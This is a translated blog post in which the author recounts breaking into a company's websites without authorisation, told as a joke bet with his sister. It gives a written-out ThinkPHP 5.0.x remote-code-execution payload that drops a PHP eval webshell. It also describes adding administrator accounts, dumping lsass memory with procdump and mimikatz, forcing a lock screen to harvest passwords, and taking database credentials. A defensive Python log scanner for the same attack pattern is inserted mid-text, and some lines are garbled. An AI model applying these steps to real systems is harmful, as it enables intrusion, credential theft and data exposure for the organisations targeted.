Recently I lost my job, wandered the streets, and competed with the old folks and aunties for empty mineral water bottles, but I couldn't keep up with the old ladies and didn't get many bottles a day (hey, there are bottles in your group). So I went home and played cards with my sister. Her card luck was great and she won game after game, which made her smug: "You're so full of yourself, big hacker, aren't you great? Hmph, I've never seen you take down a site." With my years of high EQ, not only did I not coax my sister into a good mood, I made a bet with her and said I'd take down a site today. "OK, go ahead. Hmph, I'm ignoring you." Just watch: when I win the next site, she'll worship me.
0x00 Information gathering
Information gathering is the most important step. Pick an enterprise and collect its domain name information first. A Baidu search turned up the enterprise's two main websites, fxxxx.cc and jxxxx.com, and I enumerated the subdomains of each. Usually I combine the results of other people's online tools with sublist3r, subDomainsBrute and Layer, and add Baidu and Google searches if necessary. For large vendors, N-level (deep) subdomain detection is recommended:
Check them one by one, then fingerprint each site: is it a known CMS, which language or framework does it use, and so on. Sometimes cloud-based scanners miss things, so the Firefox plug-in Wappalyzer is useful. In Yunxi you can look at "other domain names of this organization" to get more complete information. Collect the domain filing information too; there may be unexpected gains.
Then scan the IPs of the known sites with an online port scanning tool to identify open ports. Finally, integrate the information gathered from GitHub and Google searches and record everything in detail. Of course I have omitted things like whois collection; I won't say more about information gathering.
0x01 An unexpected getshell
During further information gathering and vulnerability detection on jxxxx.com, I found that appending an arbitrary string to the URL makes the server return an error page with detailed debug output, which revealed that the site runs the ThinkPHP framework, version 5.0.23. Calm on the surface, but inside I was delighted. With years of experience "penetration testing" in my own VMware lab... well, I admit I'm garbage, ha ha ha.
ThinkPHP 5.0.x and 5.1.x have an RCE; just take out the payload and connect. You can see the permissions are very high, but unfortunately I couldn't write a file, though that isn't an absolutely bad thing. At this point I showed it to my sister: "Oh, very powerful, Bo, hmph." Ah, I could feel that my sister was shocked by my speed, so fast!
But I can't get complacent; I have to keep going. "Oh, go ahead." Look, my sister is encouraging me, driving me on!
However, jxxxx.com only had one login box and two upws left_ NP pages left, and brute-forcing the login box and phpMyAdmin got nowhere. Ah! Can I be proud of that?
0x02 Another shell
Don't ask me why this title; I really couldn't think of one. On the CRM login interface I tried brute-forcing with the TOP500 usernames and weak passwords and got banned; on the remaining logins, TOP500 just returned "user name does not exist". Too hard. By now it was an hour before card time. While probing the CRM system of fxxxx.cc, there was another scribbled URL and the familiar interface: this time the ThinkPHP version was 5.0.12, also within the vulnerable range.
This time I tried to write a webshell file. Payload:
index.php? s=index/thinkapp/invokefunction&function=call_user_func_array&vars=assert&vars[email protected]_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))
Visiting the written file, phpinfo() executes:
On another site, demo.fxxxx.cc, a shell was obtained as well. As follows:
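The request shape quoted above (the s=.../invokefunction route with function=call_user_func_array and vars[...] arguments) is also what a defender looks for in the web server's access log. The following is an added example, not code from this post, that scans constructed combined-format log lines for that pattern; the IPs, timestamps and the REDACTED value are made up for the example, and ThinkPHP 5.0.x's routing of the controller named in ?s= is the assumption behind the backslash check.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined-log-format request line: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Functions whose appearance in the request marks a code-execution attempt.
DANGEROUS_FUNCS = {"call_user_func_array", "call_user_func", "assert", "eval",
                   "system", "exec", "shell_exec", "passthru", "file_put_contents", "phpinfo"}

# Constructed sample log lines (IPs, times and the REDACTED value are made up for this example).
SAMPLE_LOG = r"""
203.0.113.5 - - [10/Jan/2020:10:00:01 +0800] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1" 200 51234
203.0.113.5 - - [10/Jan/2020:10:00:02 +0800] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=REDACTED HTTP/1.1" 200 0
198.51.100.7 - - [10/Jan/2020:10:00:03 +0800] "GET /index.php?s=index/user/login HTTP/1.1" 200 2310
198.51.100.7 - - [10/Jan/2020:10:00:04 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 1204
"""

def classify_request(target):
    """Return the indicators found in one request target; an empty list means nothing suspicious."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)  # parse_qs also URL-decodes
    found = []
    route = params.get("s", [""])[0].lower()
    # ThinkPHP 5.0.x dispatches the controller named in ?s=; a backslash there means a
    # fully qualified class name was smuggled into the route, which is the vulnerable pattern.
    if "\\" in route or "invokefunction" in route:
        found.append("namespace_in_route")
    func = params.get("function", [""])[0].lower()
    if func in DANGEROUS_FUNCS:
        found.append("function=" + func)
    for key, values in params.items():
        if key.startswith("vars"):
            found.extend(key + "=" + v.lower() for v in values if v.lower() in DANGEROUS_FUNCS)
    return found

def scan_log(log_text):
    """Return one hit per suspicious request; a 200 status on such a request deserves immediate follow-up."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m.group("target"))
        if indicators:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": int(m.group("status")), "indicators": indicators})
    return hits
```

scan_log(SAMPLE_LOG) returns two hits, both from 203.0.113.5, each carrying the route, function and vars indicators; the two ordinary requests produce none. The second sample shows that percent-encoded backslashes are caught because parse_qs decodes them before the check.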
I showed it to my sister again. "Hmph! Ignoring you, don't play cards with me in the future!" Eh, I won. Why won't you play cards with me, sister? She must be angry that I won. So stingy. I'll keep going.
0x03 getshell follow-up
Of course the ultimate goal has to be remote desktop (port 3389 is open). So I opened a terminal on the demo.fxxxx.cc shell and added an administrator account. Unfortunately it could not be added to the administrators group:
Opening a terminal on the crm.fxxxx.cc shell and adding an administrator account, this time it was successfully added to the administrators group. However, on remote desktop login you are told that the connection is refused and you are not authorized to log in remotely:
Normally, in this situation, if the permissions are insufficient to add the user, you first escalate privileges and obtain SYSTEM. If you already have that and it still fails, you can grab the administrator's plaintext password: we often use procdump to dump the memory of the lsass.exe process and then read lsass.dmp with mimikatz. However, the administrator has to have logged in for the plaintext password to be in memory, otherwise you just read (null). So at this point you modify the registry to force a lock screen; when the administrator sees it and logs in again, you can grab the plaintext password.
However, after all that tossing around, the administrator was probably off playing cards with his own sister. I didn't get it. Ugh!
I looked at the source code and took the login credentials of three databases. Only the two databases of crm.fxxxx.com are posted below:
Nothing more to say; I just connected directly and didn't dare touch the data. After all, you can't play with your phone in there, and then how would I play cards with my sister?
0x04 Closing words
The next day I woke up and wrote this down. Of course, without the follow-up testing, even though I got users' login names and passwords, it's meaningless. I'd better play cards with my sister. However, after the game room was set up, my sister never came online. Ah! Are you afraid of losing? "Get lost! I don't want to talk to you anymore." Orz. Little broken site, foieojoejgoisejgijohgudgadojefoejof, out of luck!
PS: everything in this article happened while sleepwalking :).